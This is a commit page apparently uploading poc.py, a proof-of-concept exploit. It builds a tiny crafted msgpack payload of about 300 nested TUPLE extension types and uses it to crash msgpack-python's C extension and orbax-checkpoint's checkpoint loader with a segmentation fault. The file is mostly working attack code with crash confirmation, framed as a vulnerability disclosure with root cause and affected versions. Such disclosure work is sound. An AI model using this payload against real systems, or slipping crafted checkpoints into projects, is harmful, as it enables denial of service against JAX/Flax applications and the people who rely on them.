lexi-core-ai commited on
Commit
bf7ecb5
Β·
verified Β·
1 Parent(s): e8693a8

Upload poc.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. poc.py +295 -0
poc.py ADDED
@@ -0,0 +1,295 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ PoC: Stack Buffer Overflow (SIGSEGV) in msgpack-python C Extension
4
+ via Recursive ext_hook β€” Affects orbax-checkpoint (JAX/Flax Model Loading)
5
+
6
+ Vulnerability:
7
+ msgpack-python's C extension (_cmsgpack) does NOT enforce a recursion depth
8
+ limit when calling user-provided ext_hook callbacks. When an application uses
9
+ a recursive ext_hook (as orbax-checkpoint does for nested tuples), a crafted
10
+ msgpack payload with ~300 nesting levels causes a native stack overflow,
11
+ crashing the process with SIGSEGV.
12
+
13
+ The pure Python fallback is safe (Python's recursion limit catches it),
14
+ but the C extension β€” which is the DEFAULT β€” segfaults.
15
+
16
+ Impact:
17
+ - Any JAX/Flax application loading orbax checkpoints is vulnerable
18
+ - A crafted checkpoint file (< 2 KB) crashes the process with SIGSEGV
19
+ - This is a Denial of Service from a crafted model file
20
+ - SIGSEGV means no graceful error handling β€” the process is killed
21
+
22
+ Affected:
23
+ - msgpack-python (PyPI) β€” all versions with C extension (tested: 1.1.2)
24
+ - orbax-checkpoint (PyPI) β€” all versions using msgpack_utils (tested: 0.11.34)
25
+ - File: orbax/checkpoint/msgpack_utils.py, line 113-116
26
+ - Function: _msgpack_ext_unpack() β€” recursive ext_hook for TUPLE type
27
+
28
+ Root Cause:
29
+ orbax's _msgpack_ext_unpack (line 113-116) handles TUPLE ExtType by calling
30
+ msgpack.unpackb(data, ext_hook=_msgpack_ext_unpack) recursively. The msgpack
31
+ C extension processes this without any depth limit, so ~300 levels of nesting
32
+ overflow the native call stack β†’ SIGSEGV.
33
+ """
34
+
35
+ import struct
36
+ import sys
37
+ import subprocess
38
+ import tempfile
39
+ import os
40
+
41
+ BANNER = "=" * 70
42
+
43
+ # orbax TUPLE ExtType code
44
+ TUPLE_EXT_TYPE = 4
45
+
46
+
47
+ def build_nested_tuple_msgpack(depth: int = 300) -> bytes:
48
+ """
49
+ Build a msgpack payload with deeply nested TUPLE ExtType containers.
50
+
51
+ Each level wraps the inner payload in:
52
+ ext8: 0xc7 <size:1> <type:1> <data>
53
+ or ext16/ext32 for larger payloads.
54
+
55
+ The TUPLE ext_hook in orbax recursively calls msgpack.unpackb on the data,
56
+ creating depth levels of C call stack frames.
57
+ """
58
+ # Leaf: a msgpack fixarray with one fixint element [42]
59
+ # fixarray(1) = 0x91, fixint(42) = 0x2a
60
+ data = bytes([0x91, 0x2a])
61
+
62
+ for _ in range(depth):
63
+ inner_len = len(data)
64
+ if inner_len <= 255:
65
+ # ext8 format: 0xc7 + size(1 byte) + type(1 byte) + data
66
+ data = bytes([0xc7, inner_len, TUPLE_EXT_TYPE]) + data
67
+ elif inner_len <= 65535:
68
+ # ext16 format: 0xc8 + size(2 bytes BE) + type(1 byte) + data
69
+ data = bytes([0xc8]) + struct.pack('>H', inner_len) + bytes([TUPLE_EXT_TYPE]) + data
70
+ else:
71
+ # ext32 format: 0xc9 + size(4 bytes BE) + type(1 byte) + data
72
+ data = bytes([0xc9]) + struct.pack('>I', inner_len) + bytes([TUPLE_EXT_TYPE]) + data
73
+
74
+ return data
75
+
76
+
77
+ def test_segfault():
78
+ """Test: SIGSEGV from nested TUPLE ExtType via orbax's ext_hook."""
79
+ print(BANNER)
80
+ print("TEST: Stack Overflow (SIGSEGV) via Nested TUPLE ExtType")
81
+ print(BANNER)
82
+
83
+ depth = 300
84
+ payload = build_nested_tuple_msgpack(depth)
85
+ print(f"[*] Payload size: {len(payload)} bytes ({len(payload)/1024:.1f} KB)")
86
+ print(f"[*] Nesting depth: {depth}")
87
+ print(f"[*] TUPLE ExtType code: {TUPLE_EXT_TYPE}")
88
+
89
+ # Save payload to file
90
+ payload_file = tempfile.NamedTemporaryFile(suffix='.msgpack', delete=False)
91
+ payload_file.write(payload)
92
+ payload_file.close()
93
+
94
+ # Run in subprocess to catch SIGSEGV
95
+ poc_script = f'''
96
+ import msgpack
97
+ import sys
98
+
99
+ # Simulate orbax's _msgpack_ext_unpack (line 103-116 of msgpack_utils.py)
100
+ def _msgpack_ext_unpack(code, data):
101
+ if code == {TUPLE_EXT_TYPE}: # TUPLE
102
+ return tuple(msgpack.unpackb(data, raw=False, ext_hook=_msgpack_ext_unpack))
103
+ return msgpack.ExtType(code, data)
104
+
105
+ with open("{payload_file.name}", "rb") as f:
106
+ payload = f.read()
107
+
108
+ print(f"Payload size: {{len(payload)}} bytes", flush=True)
109
+ print("Unpacking with recursive ext_hook (simulating orbax)...", flush=True)
110
+ result = msgpack.unpackb(payload, raw=False, ext_hook=_msgpack_ext_unpack)
111
+ print(f"Result: {{result}}")
112
+ '''
113
+
114
+ poc_file = tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False)
115
+ poc_file.write(poc_script)
116
+ poc_file.close()
117
+
118
+ print(f"\n[*] Running in subprocess (to catch SIGSEGV)...")
119
+ result = subprocess.run(
120
+ [sys.executable, poc_file.name],
121
+ capture_output=True, text=True, timeout=10
122
+ )
123
+
124
+ print(f"[*] Exit code: {result.returncode}")
125
+ if result.stdout:
126
+ for line in result.stdout.strip().split('\n'):
127
+ print(f" {line}")
128
+
129
+ os.unlink(payload_file.name)
130
+ os.unlink(poc_file.name)
131
+
132
+ if result.returncode == -11: # SIGSEGV
133
+ print(f"\n[!] VULNERABILITY CONFIRMED β€” SIGSEGV (Segmentation Fault)")
134
+ print(f" A {len(payload)}-byte msgpack payload crashes the process.")
135
+ print(f" No graceful error handling β€” the process is killed by the OS.")
136
+ return True
137
+ elif result.returncode < 0:
138
+ import signal
139
+ sig = -result.returncode
140
+ sig_name = signal.Signals(sig).name if sig in signal.Signals._value2member_map_ else f"signal {sig}"
141
+ print(f"\n[!] VULNERABILITY CONFIRMED β€” {sig_name}")
142
+ return True
143
+ else:
144
+ print(f"\n[-] No crash (unexpected)")
145
+ return False
146
+
147
+
148
+ def test_orbax_loading():
149
+ """Test: Crash via actual orbax msgpack_restore."""
150
+ print(f"\n{BANNER}")
151
+ print("TEST: Crash via orbax.checkpoint.msgpack_utils.msgpack_restore()")
152
+ print(BANNER)
153
+
154
+ depth = 300
155
+ payload = build_nested_tuple_msgpack(depth)
156
+
157
+ payload_file = tempfile.NamedTemporaryFile(suffix='.msgpack', delete=False)
158
+ payload_file.write(payload)
159
+ payload_file.close()
160
+
161
+ poc_script = f'''
162
+ import sys
163
+ sys.stdout.write("Importing orbax...\\n")
164
+ sys.stdout.flush()
165
+ from orbax.checkpoint.msgpack_utils import msgpack_restore
166
+ sys.stdout.write("Calling msgpack_restore() on crafted payload...\\n")
167
+ sys.stdout.flush()
168
+
169
+ with open("{payload_file.name}", "rb") as f:
170
+ payload = f.read()
171
+
172
+ result = msgpack_restore(payload)
173
+ sys.stdout.write(f"Result: {{result}}\\n")
174
+ '''
175
+
176
+ poc_file = tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False)
177
+ poc_file.write(poc_script)
178
+ poc_file.close()
179
+
180
+ print(f"[*] Calling orbax.checkpoint.msgpack_utils.msgpack_restore()...")
181
+ result = subprocess.run(
182
+ [sys.executable, poc_file.name],
183
+ capture_output=True, text=True, timeout=30
184
+ )
185
+
186
+ print(f"[*] Exit code: {result.returncode}")
187
+ if result.stdout:
188
+ for line in result.stdout.strip().split('\n'):
189
+ print(f" {line}")
190
+ if result.stderr:
191
+ for line in result.stderr.strip().split('\n')[:5]:
192
+ print(f" stderr: {line}")
193
+
194
+ os.unlink(payload_file.name)
195
+ os.unlink(poc_file.name)
196
+
197
+ if result.returncode == -11:
198
+ print(f"\n[!] CONFIRMED β€” orbax.msgpack_restore() crashes with SIGSEGV")
199
+ return True
200
+ elif result.returncode < 0:
201
+ print(f"\n[!] CONFIRMED β€” orbax.msgpack_restore() crashes (signal {-result.returncode})")
202
+ return True
203
+ else:
204
+ print(f"\n[-] No crash")
205
+ return False
206
+
207
+
208
+ def test_pure_python_safe():
209
+ """Verify: Pure Python fallback is safe (catches RecursionError)."""
210
+ print(f"\n{BANNER}")
211
+ print("TEST: Pure Python fallback handles this safely")
212
+ print(BANNER)
213
+
214
+ depth = 300
215
+ payload = build_nested_tuple_msgpack(depth)
216
+
217
+ poc_script = f'''
218
+ import msgpack
219
+ import msgpack.fallback as fallback
220
+
221
+ def _msgpack_ext_unpack(code, data):
222
+ if code == {TUPLE_EXT_TYPE}:
223
+ return tuple(fallback.unpackb(data, raw=False, ext_hook=_msgpack_ext_unpack))
224
+ return msgpack.ExtType(code, data)
225
+
226
+ with open("/dev/stdin", "rb") as f:
227
+ pass
228
+
229
+ import io
230
+ payload = {repr(payload)}
231
+ try:
232
+ result = fallback.unpackb(payload, raw=False, ext_hook=_msgpack_ext_unpack)
233
+ print(f"Result: {{result}}")
234
+ except RecursionError:
235
+ print("RecursionError caught β€” safe!")
236
+ except Exception as e:
237
+ print(f"Error: {{type(e).__name__}}: {{e}}")
238
+ '''
239
+
240
+ poc_file = tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False)
241
+ poc_file.write(poc_script)
242
+ poc_file.close()
243
+
244
+ result = subprocess.run(
245
+ [sys.executable, poc_file.name],
246
+ capture_output=True, text=True, timeout=10
247
+ )
248
+
249
+ os.unlink(poc_file.name)
250
+
251
+ if "RecursionError caught" in result.stdout:
252
+ print(f"[*] Pure Python fallback: RecursionError caught safely")
253
+ print(f" The C extension is the problem β€” it bypasses Python's recursion limit")
254
+ return True
255
+ else:
256
+ print(f" Exit code: {result.returncode}")
257
+ print(f" Output: {result.stdout[:200]}")
258
+ return False
259
+
260
+
261
+ if __name__ == "__main__":
262
+ print(f"Python: {sys.version}")
263
+
264
+ import msgpack
265
+ print(f"msgpack: {'.'.join(map(str, msgpack.version))}")
266
+ print(f"C extension: {hasattr(msgpack, '_cmsgpack')}")
267
+
268
+ try:
269
+ import orbax.checkpoint
270
+ print(f"orbax-checkpoint: {orbax.checkpoint.__version__}")
271
+ except Exception:
272
+ print("orbax-checkpoint: not installed (PoC still works with plain msgpack)")
273
+
274
+ print()
275
+
276
+ r1 = test_segfault()
277
+ r2 = test_orbax_loading()
278
+ r3 = test_pure_python_safe()
279
+
280
+ print(f"\n{BANNER}")
281
+ print("RESULTS")
282
+ print(BANNER)
283
+ print(f" SIGSEGV (C extension): {'VULN' if r1 else 'NOT VULN'}")
284
+ print(f" orbax.msgpack_restore(): {'VULN' if r2 else 'NOT VULN'}")
285
+ print(f" Pure Python (safe): {'SAFE' if r3 else 'UNKNOWN'}")
286
+ print()
287
+ print("Root cause: msgpack-python C extension (_cmsgpack) has no recursion")
288
+ print("depth limit when calling ext_hook callbacks. orbax-checkpoint uses a")
289
+ print("recursive ext_hook for TUPLE types. A crafted payload with ~300 nested")
290
+ print("TUPLE ExtTypes overflows the native stack β†’ SIGSEGV β†’ process crash.")
291
+ print()
292
+ print("Affected packages:")
293
+ print(" - msgpack (PyPI) β€” C extension has no depth limit")
294
+ print(" - orbax-checkpoint (PyPI) β€” recursive ext_hook in msgpack_utils.py")
295
+ print(" - Any JAX/Flax application loading checkpoints via orbax")